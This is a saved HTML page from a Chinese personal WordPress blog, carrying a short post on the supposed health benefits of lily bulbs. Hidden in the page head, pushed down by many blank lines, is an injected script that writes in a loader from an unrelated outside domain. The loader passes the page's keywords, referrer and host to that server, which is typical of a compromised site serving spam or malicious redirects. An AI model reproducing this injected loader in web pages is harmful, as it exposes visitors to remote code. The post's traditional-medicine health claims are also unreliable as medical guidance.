<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<title>百合的作用 &laquo;  傅娟的小站 </title>
		<meta name="keywords" content="lily, 百合, " />
	<meta name="description" content="

过年在家的时候，妈妈买了不少百合，埋在土里面，说这种食材对外公的肺有很大帮助。今天能在楼下买到百合这样的食材，真是好开心。我也要试试。

看下百合的功效：

   " />
	<link href="http://www.fujuan.net/wp-content/themes/Hcms/style.css" rel="stylesheet" type="text/css" />
	<script type="text/javascript" src="http://lib.sinaapp.com/js/jquery/1.4.2/jquery.min.js"></script>
	<script type="text/javascript">window.jQuery || document.write('<script type="text/javascript" src="http://www.fujuan.net/wp-content/themes/Hcms/js/jquery.js">\x3C/script>')</script>
	<script type="text/javascript" src="http://www.fujuan.net/wp-content/themes/Hcms/js/jquery_cmhello.js"></script>
		<script type="text/javascript">HcmsLazyload("http://www.fujuan.net/wp-content/themes/Hcms/images/space.gif");</script> 
	<!--[if IE 6]>
	<link href="http://www.fujuan.net/wp-content/themes/Hcms/ie6.css" rel="stylesheet" type="text/css" />
	<script src="http://letskillie6.googlecode.com/svn/trunk/letskillie6.zh_CN.pack.js"></script>
	<script src="http://www.fujuan.net/wp-content/themes/Hcms/js/PNG.js"></script>
	<script>DD_belatedPNG.fix('.png_bg');</script>
	<![endif]-->
	<link rel="shortcut icon" href="http://www.fujuan.net/favicon.ico"/>
	<link rel="alternate" type="application/rss+xml" title="傅娟的小站 RSS Feed" href="http://www.fujuan.net/feed" />
	<link rel="alternate" type="application/atom+xml" title="傅娟的小站 Atom Feed" href="http://www.fujuan.net/feed/atom" />
	<link rel="pingback" href="http://www.fujuan.net/xmlrpc.php" />
	<script type="text/javascript">
var duoshuoQuery = {"short_name":"juan","sso":{"login":"http:\/\/www.fujuan.net\/wp-login.php?action=duoshuo_login","logout":"http:\/\/www.fujuan.net\/wp-login.php?action=logout&_wpnonce=f25afb62cd"},"remote_auth":"W10= 27ee46a6b48b84cdfda5e454ba0e5d18461368d7 1492315391"};
duoshuoQuery.sso.login += '&redirect_to=' + encodeURIComponent(window.location.href);
duoshuoQuery.sso.logout += '&redirect_to=' + encodeURIComponent(window.location.href);
</script>
<script type='text/javascript' src='http://static.duoshuo.com/embed.js'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.fujuan.net/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.fujuan.net/wp-includes/wlwmanifest.xml" /> 

























































<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://pousadalagoazul.com/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://pousadalagoazul.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body>

	<div id="header" class="png_bg">
		<div id="header_inner">
    		<strong class="logo">
			<a href="http://www.fujuan.net" class="png_bg" title="傅娟的小站">傅娟的小站</a>
			</strong>
       <div class="header_bg png_bg"></div>
       <div class="toplinks">
       <div id="_userlogin"><em>您好！欢迎光临我的博客O(∩_∩)O~</em> 	
			<a href="http://www.fujuan.net" title="欢迎订阅我的博客" target="_blank">RSS订阅</a><span>|</span><a href="http://www.fujuan.net/wp-login.php" title="登录管理" target="_blank">登录</a>
       </div>
       	<div id="top_nav">
			<form name="formsearch" method="get" action="http://www.fujuan.net">
				<div class="form clearfix">
           		<label for="s" ></label>
           		<input type="text" name="s" class="search-keyword" onfocus="if (this.value == '请输入关键字进行搜索') {this.value = '';}" onblur="if (this.value == '') {this.value = '请输入关键字进行搜索';}" value="请输入关键字进行搜索" />   
         		<button type="submit" class="select_class" onmouseout="this.className='select_class'" onmouseover="this.className='select_over'" />搜索</button>
				</div>
			</form>
            </div>
       </div>
	   <div id="navmenu" class="menu-%e8%8f%9c%e5%8d%95%e3%80%82%e3%80%82-container"><ul id="menu-%e8%8f%9c%e5%8d%95%e3%80%82%e3%80%82" class="menu"><li id="menu-item-25" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-25"><a href="http://www.fujuan.net/">首页</a></li>
<li id="menu-item-1221" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1221"><a href="http://www.fujuan.net/category/beautiful">美丽心情</a>
<ul class="sub-menu">
	<li id="menu-item-1223" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1223"><a href="http://www.fujuan.net/category/life">人生感悟</a></li>
	<li id="menu-item-1224" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1224"><a href="http://www.fujuan.net/category/journey">旅途心情</a></li>
</ul>
</li>
<li id="menu-item-1225" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1225"><a href="http://www.fujuan.net/category/music">音乐记忆</a></li>
<li id="menu-item-1591" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-1591"><a href="http://www.fujuan.net/category/health">健康生活</a>
<ul class="sub-menu">
	<li id="menu-item-1594" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1594"><a href="http://www.fujuan.net/category/nutrition">营养学</a></li>
</ul>
</li>
<li id="menu-item-26" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26"><a href="http://www.fujuan.net/about">关于傅娟</a>
<ul class="sub-menu">
	<li id="menu-item-1592" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1592"><a href="http://www.fujuan.net/category/career">职场观点</a></li>
	<li id="menu-item-1593" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1593"><a href="http://www.fujuan.net/category/management">管理分享</a></li>
</ul>
</li>
<li id="menu-item-804" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-804"><a href="http://www.fujuan.net/guestbook">留言本</a></li>
<li id="menu-item-805" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-805"><a href="http://www.fujuan.net/links">友情链接</a></li>
</ul></div>	   <div class="clearfix"></div>
    </div>
</div><div id="wrapper" class="clearfix">
	<div id="breadcrumbs" class="con_box clearfix">
		<div class="bcrumbs"><strong><a href="http://www.fujuan.net" title="返回首页">home</a></strong>
		<a href="http://www.fujuan.net/category/health" title="查看 健康生活 中的全部文章" rel="category tag">健康生活</a>		<a>百合的作用</a>
		</div>
	</div>
 	<div id="art_container clearfix">
 		<div id="art_main1" class="art_white_bg fl"> 
			            <div class="art_title clearfix">
            <span class="face_img"><img alt='' src='http://1.gravatar.com/avatar/964f0e745c34232e230addcd163d12e8?s=50&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&amp;r=G' class='avatar avatar-50 photo' height='50' width='50' /></span>
				<h1>百合的作用</h1>
				<p class="info">
				<small>时间:</small>12-07-13 
				<small>栏目:</small><a href="http://www.fujuan.net/category/health" title="查看 健康生活 中的全部文章" rel="category tag">健康生活</a> 
				<small>作者:</small>如月 
				<small>评论:</small><span class="ds-thread-count" data-thread-key="1659" data-replace="1">1</span>				<small>点击:</small> 4,046 次								</p><!-- /info -->  
			</div>
			<div class="article_content">
				<div class="article-tag">
				<p><strong>本文标签</strong>： <a href="http://www.fujuan.net/tag/lily" rel="tag">lily</a> , <a href="http://www.fujuan.net/tag/%e7%99%be%e5%90%88" rel="tag">百合</a></p>				</div>
																<div class="clear"></div>
				<div style="clear:both; margin-top:5px; margin-bottom:5px;"></div><div style="float:left"><!-- JiaThis Button BEGIN -->
<div id="ckepop">
	<span class="jiathis_txt">分享到：</span>
	<a class="jiathis_button_icons_1"></a>
	<a class="jiathis_button_icons_2"></a>
	<a class="jiathis_button_icons_3"></a>
	<a class="jiathis_button_icons_4"></a>
	<a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jtico jtico_jiathis" target="_blank"></a>
	<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" src="http://v2.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END --></div><div style="clear:both; margin-top:5px; margin-bottom:5px;"></div><p><a href="http://www.fujuan.net/wp-content/uploads/2012/07/baihe.jpg"><img src="http://www.fujuan.net/wp-content/uploads/2012/07/baihe.jpg" alt="" title="baihe" width="500" height="300" class="alignleft size-full wp-image-1762" /></a></p>
<p>过年在家的时候，妈妈买了不少百合，埋在土里面，说这种食材对外公的肺有很大帮助。今天能在楼下买到百合这样的食材，真是好开心。我也要试试。</p>
<p>看下百合的功效：</p>
<p>  <strong> 润肺止咳，清心安神，补中益气，清热利尿，清热解毒，凉血止血，健脾和胃。治肺痨久嗽，咳唾痰血，百合病，心悸怔忡，失眠多梦，烦燥不安，心痛，喉痹，胃阴不足之胃痛，二便不利，浮肿，痈肿疮毒，脚气，产后出血，腹胀，身痛。</strong></p>
<p>百合的作用：</p>
<p><strong>1.镇咳祛痰作用</strong><br />
  有明显的镇咳和有显著的祛痰作用。 </p>
<p><strong>2. 镇静作用</strong><br />
  具有显著地增加戊巴比妥钠睡眠时间及阈下剂量的睡眠率，提示有明显的镇静作用。</p>
<p><strong>3.滋阴润肺作用</strong></p>
<p><strong>4.强壮作用</strong></p>
 
				<div class="adt">
	<div class="ad_t"><a href="http://iliunan.com/a138.html" target="_blank"><img src="http://iliunan.com/wp-content/uploads/2012/03/1.jpg" alt="聆听春天的声音" /></a>	<div class="clear"></div>
	</div>
</div>				<div class="clear"></div>
            			
				<div class="postcopyright">
					<p><strong> 声明: </strong> 本文由(<a href="http://www.fujuan.net"> 如月 </a>)原创编译，转载请保留链接: <a href="http://www.fujuan.net/lily.html" title=百合的作用>百合的作用</a></p>
				</div>
							</div><!--正文--> 
			<div class="con_pretext clearfix">
					<ul>
						<li class="first">上一篇：<a href="http://www.fujuan.net/quhuo.html" rel="prev">这个夏天降降火</a> </li>
						<li class="last">下一篇：<a href="http://www.fujuan.net/blueberries.html" rel="next">蓝莓的营养价值</a></li>
					</ul>
			</div><!--上一页 下一页-->              
			<a name="comments"></a>

<div class="ds-thread" data-thread-key="1659" data-author-key="1" data-title="百合的作用" data-url="http://www.fujuan.net/lily.html"></div>

<script type="text/javascript">
	if (typeof DUOSHUO !== 'undefined')
		DUOSHUO.EmbedThread('.ds-thread');
</script>
	<div id="ds-ssr">

		
            <ol id="commentlist">
                		<li class="comment even thread-even depth-1" id="li-comment-5772">
			<article id="comment-5772" class="comment">
				<footer class="comment-meta">
					<cite class="comment-author vcard">
						<span class="fn"><a href='http://www.renren.com/profile.do?id=919530440' rel='external nofollow' class='url'>新用户895293</a></span> on <a rel="nofollow" href="http://www.fujuan.net/lily.html#comment-5772"><time pubdate datetime="2017-04-10T04:05:08+00:00">2017/04/10 at 04:05</time></a> <span class="says">said:</span>					</cite><!-- .comment-author .vcard -->
				</footer>
	
				<div class="comment-content"><p>起码也要告诉我们几周跟新一次</p>
</div>
				
			</article><!-- #comment-## -->
		</li>
            </ol>

		            
    </div>																<div class="clear"></div>
		</div><!--内容-->

			
	</div>
		<div class="clear"></div>

<div id="sider" class="fr">
	<div class="feed-mail">
	<div class="box">
		<ul id="contact-li">
			<li class="qq"><a rel="nofollow" target="_blank" href="http://wpa.qq.com/msgrd?V=1&Menu=yes&Uin=346603924" title="有急事请Q我">QQ联系</a></li>
			<li class="email"><a rel="nofollow" target="_blank" href="mailto:346603924@qq.com" title="发邮件给我">邮件</a></li>
			<li class="twitter"><a rel="nofollow" target="_blank" href="" title="收听我的Twitter微博">Twitter微博</a></li>
			<li class="qqmblog"><a rel="nofollow" target="_blank" href="http://t.qq.com/ifujuan" title="收听我的腾讯微博">腾讯微博</a></li>
			<li class="sinamblog"><a rel="nofollow" target="_blank" href="http://weibo.com/ifujuan" title="收听我的新浪微博">新浪微博</a></li>
			<li class="rss"><a rel="nofollow" target="_blank" href="http://www.fujuan.net" title="通过RSS订阅我的博客">RSS订阅</a></li>
		</ul>
	</div>
		<form action="http://list.qq.com/cgi-bin/qf_compose_send" target="_blank" method="post">
			<input type="hidden" name="t" value="qf_booked_feedback">
			<input type="hidden" name="id" value="abfd5135e1566f7c54a391c76d6d92309c75f287ad0a50c4">
			<input id="to" onfocus="if (this.value == '输入邮箱 订阅本站') {this.value = '';}" onblur="if (this.value == '') {this.value = '输入邮箱 订阅本站';}" value="输入邮箱 订阅本站" name="to" type="text" class="feed-mail-input"><input class="feed-mail-btn" type="submit" value="订阅">
		</form>
		<div class="gg">
<p>------======<strong> 本站公告 </strong>======------<br/>
<center>一花一世界,一叶一追寻</center>
<center>一曲一场叹,一生为一人</center></p>
			<div class="clear"></div>
</div>		<div class="clear"></div>
</div><div class="clear"></div>
	<div class="con_box htabs_art clearfix"> 
		<ul class="cooltab_nav sj_nav clearfix">
			<li><a href="#" class="active" title="new_art">最新文章</a></li>
			<li><a href="#" title="hot_art">热门文章</a></li>
			<li><a href="#" title="rand_art">随机推荐</a></li>
		</ul>   
		<div id="new_art" class="com_cont">   
			<ul>
												<li>
				<a href="http://www.fujuan.net/big-fish.html" title="在这个世界相遇" class="title">在这个世界相遇</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/tianshang.html" title="种在了天上" class="title">种在了天上</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/well.html" title="这样就很好" class="title">这样就很好</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/the-only-one.html" title="The only one" class="title">The only one</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/hp.html" title="幽门螺旋杆菌的治疗，饮食上要注意哪些？" class="title">幽门螺旋杆菌的治疗，饮食上要注意哪些...</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/on-children.html" title="On children" class="title">On children</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/to-myself.html" title="我有一副身体，但我并非自己的身体。" class="title">我有一副身体，但我并非自己的身体。</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/thanks.html" title="《感谢》" class="title">《感谢》</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/more-than-0-01-distance.html" title="密码保护：青葱岁月-不止0.01的距离" class="title">青葱岁月-不止0.01的距离</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/to-mr-king.html" title="密码保护：青葱岁月&#8211;To MR.King" class="title">青葱岁月--To MR.King</a>
				</li>
							</ul>                    
		</div>
        <div id="hot_art" class="com_cont">  
            <ul>
												<li>
				<a href="http://www.fujuan.net/how-to-eat-safe.html" class="title" title="怎样吃最安全？">怎样吃最安全？</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/true-love.html" class="title" title="有时候，选择快乐，更需要勇气">有时候，选择快乐，更需要勇气</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/take-easy.html" class="title" title="悠着点，慢着点 ——“贫富与欲望”漫谈【莫言】">悠着点，慢着点 ——“贫富与欲望”漫谈...</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/drink-water.html" class="title" title="女人必知！关于喝水的17个惊人真相">女人必知！关于喝水的17个惊人真相</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/climacteric.html" class="title" title="【转】关于钓鱼岛的话题">【转】关于钓鱼岛的话题</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/circumscription.html" class="title" title="界限">界限</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/wild-mushroom.html" class="title" title="秋天必吃的9种野生菌">秋天必吃的9种野生菌</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/autumnal-equinox.html" class="title" title="湿热体质秋分节气的“活法儿”">湿热体质秋分节气的“活法儿”</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/sejie.html" class="title" title="从《色戒》中感悟销售">从《色戒》中感悟销售</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/yinian.html" class="title" title="时间会告诉你，一念执着多么多余">时间会告诉你，一念执着多么多余</a>
				</li>
							</ul>      
		</div>
		<div id="rand_art" class="com_cont">  
			<ul>
												<li>
				<a href="http://www.fujuan.net/do-not-let-the-doctors-do-not-understand-nutrition-harm-you.html" class="title" title="连载一《别让不懂营养学的医生害了你》">连载一《别让不懂营养学的医生害了你》</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/see-or-miss.html" class="title" title="见或不见">见或不见</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/relieve-dry-bowel-syndrome.html" class="title" title="缓解肠燥症-Nature life">缓解肠燥症-Nature life</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/carrot.html" class="title" title="胡萝卜吃多了为何会皮肤发黄">胡萝卜吃多了为何会皮肤发黄</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/shenxudeshidai.html" class="title" title="肾虚的时代">肾虚的时代</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/lamb.html" class="title" title="吃羊肉五禁忌：茶水是羊肉的克星">吃羊肉五禁忌：茶水是羊肉的克星</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/eye-fatigue.html" class="title" title="眼疲劳者应多注意营养的平衡">眼疲劳者应多注意营养的平衡</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/do-not-sedentary.html" class="title" title="久坐是离死亡最近的方式">久坐是离死亡最近的方式</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/honey-water.html" class="title" title="经常喝蜂蜜水的好处">经常喝蜂蜜水的好处</a>
				</li>
								<li>
				<a href="http://www.fujuan.net/missing.html" class="title" title="有些人只适合思念，不适合见面">有些人只适合思念，不适合见面</a>
				</li>
							</ul>
		</div>   
	</div>
	<div class="con_box hot_box">
		<h3>热门标签</h3>
			<ul class="tagcloudy">
				<li>
				<a href='http://www.fujuan.net/tag/baby' class='tag-link-72' title='6 个话题' style="color:#a869a6;font-size: 16.4594594595px;;">baby</a>
<a href='http://www.fujuan.net/tag/honey-water' class='tag-link-257' title='1 个话题' style="color:#24117a;font-size: 12px;;">Honey water</a>
<a href='http://www.fujuan.net/tag/lily' class='tag-link-110' title='2 个话题' style="color:#7f5a06;font-size: 13.4594594595px;;">lily</a>
<a href='http://www.fujuan.net/tag/nature-life' class='tag-link-262' title='6 个话题' style="color:#fa9e5c;font-size: 16.4594594595px;;">Nature life</a>
<a href='http://www.fujuan.net/tag/te-extrano' class='tag-link-255' title='1 个话题' style="color:#56223c;font-size: 12px;;">Te extraño</a>
<a href='http://www.fujuan.net/tag/%e5%81%a5%e5%ba%b7' class='tag-link-93' title='9 个话题' style="color:#f2f716;font-size: 17.6756756757px;;">健康</a>
<a href='http://www.fujuan.net/tag/%e5%81%a5%e5%ba%b7%e9%a3%9f%e7%89%a9' class='tag-link-260' title='1 个话题' style="color:#a4364d;font-size: 12px;;">健康食物</a>
<a href='http://www.fujuan.net/tag/%e5%85%bb%e6%8a%a4%e5%bf%83%e8%84%8f' class='tag-link-259' title='1 个话题' style="color:#6a5dd5;font-size: 12px;;">养护心脏</a>
<a href='http://www.fujuan.net/tag/%e5%88%9b%e4%b8%9a' class='tag-link-37' title='2 个话题' style="color:#cce619;font-size: 13.4594594595px;;">创业</a>
<a href='http://www.fujuan.net/tag/%e5%92%b3%e5%97%bd' class='tag-link-250' title='2 个话题' style="color:#517785;font-size: 13.4594594595px;;">咳嗽</a>
<a href='http://www.fujuan.net/tag/%e5%a6%82%e6%9c%88' class='tag-link-111' title='2 个话题' style="color:#6e2a82;font-size: 13.4594594595px;;">如月</a>
<a href='http://www.fujuan.net/tag/%e5%bc%ba%e8%bf%ab%e7%97%87' class='tag-link-153' title='2 个话题' style="color:#34dd81;font-size: 13.4594594595px;;">强迫症</a>
<a href='http://www.fujuan.net/tag/%e5%bf%83%e7%90%86%e7%8e%b0%e8%b1%a1' class='tag-link-186' title='2 个话题' style="color:#40d0a6;font-size: 13.4594594595px;;">心理现象</a>
<a href='http://www.fujuan.net/tag/%e5%bf%98%e5%bf%a7' class='tag-link-6' title='1 个话题' style="color:#a96a51;font-size: 12px;;">忘忧</a>
<a href='http://www.fujuan.net/tag/%e6%80%aa%e8%af%9e%e5%bf%83%e7%90%86%e5%ad%a6' class='tag-link-185' title='2 个话题' style="color:#c12eac;font-size: 13.4594594595px;;">怪诞心理学</a>
<a href='http://www.fujuan.net/tag/%e6%8e%92%e6%af%92%e9%a3%9f%e7%89%a9' class='tag-link-123' title='2 个话题' style="color:#42ba42;font-size: 13.4594594595px;;">排毒食物</a>
<a href='http://www.fujuan.net/tag/%e6%98%a5%e5%ad%a3' class='tag-link-243' title='2 个话题' style="color:#bea38b;font-size: 13.4594594595px;;">春季</a>
<a href='http://www.fujuan.net/tag/%e6%b5%81%e6%b5%aa' class='tag-link-5' title='1 个话题' style="color:#434a85;font-size: 12px;;">流浪</a>
<a href='http://www.fujuan.net/tag/%e7%94%b2%e4%ba%a2' class='tag-link-46' title='3 个话题' style="color:#a6aded;font-size: 14.4324324324px;;">甲亢</a>
<a href='http://www.fujuan.net/tag/%e7%ae%a1%e7%90%86' class='tag-link-28' title='2 个话题' style="color:#11a095;font-size: 13.4594594595px;;">管理</a>
<a href='http://www.fujuan.net/tag/%e7%ba%a2%e6%9e%a3' class='tag-link-103' title='2 个话题' style="color:#8c72eb;font-size: 13.4594594595px;;">红枣</a>
<a href='http://www.fujuan.net/tag/%e8%90%a5%e5%85%bb' class='tag-link-206' title='6 个话题' style="color:#3243b7;font-size: 16.4594594595px;;">营养</a>
<a href='http://www.fujuan.net/tag/%e8%90%a5%e5%85%bb%e5%ad%a6' class='tag-link-104' title='10 个话题' style="color:#63eed3;font-size: 18px;;">营养学</a>
<a href='http://www.fujuan.net/tag/%e8%90%a5%e5%85%bb%e7%b4%a0' class='tag-link-241' title='2 个话题' style="color:#7a23aa;font-size: 13.4594594595px;;">营养素</a>
<a href='http://www.fujuan.net/tag/%e8%9c%82%e8%9c%9c%e6%b0%b4' class='tag-link-258' title='1 个话题' style="color:#a28cb1;font-size: 12px;;">蜂蜜水</a>
<a href='http://www.fujuan.net/tag/%e8%a1%a5%e8%a1%80' class='tag-link-256' title='1 个话题' style="color:#c39b17;font-size: 12px;;">补血</a>
<a href='http://www.fujuan.net/tag/%e9%99%8d%e7%81%ab' class='tag-link-83' title='2 个话题' style="color:#df4fd4;font-size: 13.4594594595px;;">降火</a>
<a href='http://www.fujuan.net/tag/%e9%9f%b3%e4%b9%90%e8%ae%b0%e5%bf%86' class='tag-link-99' title='2 个话题' style="color:#95b22e;font-size: 13.4594594595px;;">音乐记忆</a>
<a href='http://www.fujuan.net/tag/%e9%a3%9f%e7%96%97' class='tag-link-234' title='2 个话题' style="color:#1d8a82;font-size: 13.4594594595px;;">食疗</a>
<a href='http://www.fujuan.net/tag/%e9%a3%9f%e8%b0%b1' class='tag-link-92' title='2 个话题' style="color:#62f86e;font-size: 13.4594594595px;;">食谱</a>				</li>
				</ul>
	</div> 
		<div class="con_box hot_box">
		<h3>读者排行</h3>
		<div class="readers clearfix">
			<a rel="nofollow" href="http://t.qq.com/liunan2012" title="刘楠 留下 1 个脚印" target="_blank"><img alt='刘楠 留下 1 个脚印' src='http://1.gravatar.com/avatar/bac1889d6d280ad2aa4e0d2cd222c270?s=48&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D48&amp;r=G' class='avatar avatar-48 photo' height='48' width='48' /></a>		</div>
	</div> 
	<div class="con_box hot_box">
		<h3>最新评论</h3>
		<div class="r_comments">
			<ul>
			
<li><img alt='新用户091265' src='http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=32' class='avatar avatar-32 photo avatar-default' height='32' width='32' /> <a href="http://www.fujuan.net/guoqingchangjia.html#comment-5863" title="发表在： 国庆长假happy">新用户091265:<br/>嗯、等到了！！</a><br /></li>
<li><img alt='新用户679356' src='http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=32' class='avatar avatar-32 photo avatar-default' height='32' width='32' /> <a href="http://www.fujuan.net/friend.html#comment-5864" title="发表在： my friends">新用户679356:<br/>明天元旦 作者呀 就更新一章吧</a><br /></li>
<li><img alt='新用户149656' src='http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=32' class='avatar avatar-32 photo avatar-default' height='32' width='32' /> <a href="http://www.fujuan.net/liunan.html#comment-5865" title="发表在： 我和刘楠的故事">新用户149656:<br/>你他妈妈的，像你这样态度。没人爱</a><br /></li>
<li><img alt='新用户491324' src='http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=32' class='avatar avatar-32 photo avatar-default' height='32' width='32' /> <a href="http://www.fujuan.net/?attachment_id=341#comment-5866" title="发表在： 7">新用户491324:<br/>我去看了《宇宙结构 时间幻相》，</a><br /></li>
<li><img alt='新用户529587' src='http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=32' class='avatar avatar-32 photo avatar-default' height='32' width='32' /> <a href="http://www.fujuan.net/beautiful.html/baby#comment-5867" title="发表在： baby">新用户529587:<br/>手机使用UC，百度浏览器。</a><br /></li>			</ul>
		</div>				
	</div>
		<div id="rollstart"></div>
			<div class="con_box hot_box" id="tuijian">
	<h3>为您推荐</h3>
		<div class="ads">
		<a href="http://www.fujuan.net/" target="_blank"><img src="http://img.fujuan.net/2012/01/250-250.jpg" alt="fish专用 Theme by fujuan.net" /></a>		</div>
</div>		<div class="clear"></div>
		</div>
</div> 
</div><!-- //wrapper -->
<!-- //底部模板 -->
<div id="footer" class="clearfix">
    <div class="con_box ">
	          <div class="footer_bug">
			<a rel="nofollow" href="/about" target="_blank">关于傅娟</a>  |           
            <a href="/sitemap_baidu.xml" target="_blank">百度地图</a> | 
            <a href="/sitemap.xml" target="_blank">谷歌地图</a>   
          </div>

    </div>
    	<div class="copyright">
      	<p>   傅娟的小站为个人站点，用于记录傅娟的胡思乱想和成长点滴<br/>如你对本站或傅娟有任何建议，请及时联系傅娟（<a href="mailto:346603924@qq.com">346603924@qq.com</a>），傅娟将尽快处理。<br/></p>
<p class="powered">Copyright&copy; 2010-2012  <a href="http://www.fujuan.net/" title="傅娟的小站">fujuan.net</a>.  鄂ICP备52ln13141111  <script language="javascript" src="http://count16.51yes.com/click.aspx?id=162575677&logo=1" charset="gb2312"></script>  62次查询</p>        

<!-- /powered -->
   </div>
   <div class="footer_right">
   <img src="http://www.fujuan.net/wp-content/themes/Hcms/images/footer_logo.jpg" width="166" height="67" alt="傅娟的小站" />
   <p>Powered by <a href="http://wordpress.org" title="WordPress博客程序" target="_blank">WordPress</a> & <a href="http://www.fujuan.net" title="傅娟的小站" target="_blank">fujuan.net</a>.</p>
   </div>
   <script type="text/javascript">
	DUOSHUO.RecentCommentsWidget('.widget_recent_comments #recentcomments', {template : 'wordpress'});
</script>
			<div id="shangxia"><div id="shang" title="↑ 返回顶部"></div>
				<div id="comt" title="查看评论"></div>
		<script type="text/javascript" src="http://www.fujuan.net/wp-content/themes/Hcms/comments-ajax.js"></script>
				<div id="xia" title="↓ 移至底部"></div>
		<div id="myrss" title="Hi! 我是如月，赶快进来逛一逛吧O(∩_∩)O~" onClick="window.open('http://www.fujuan.net','_blank');"></div></div>
</div>
</body>
</html>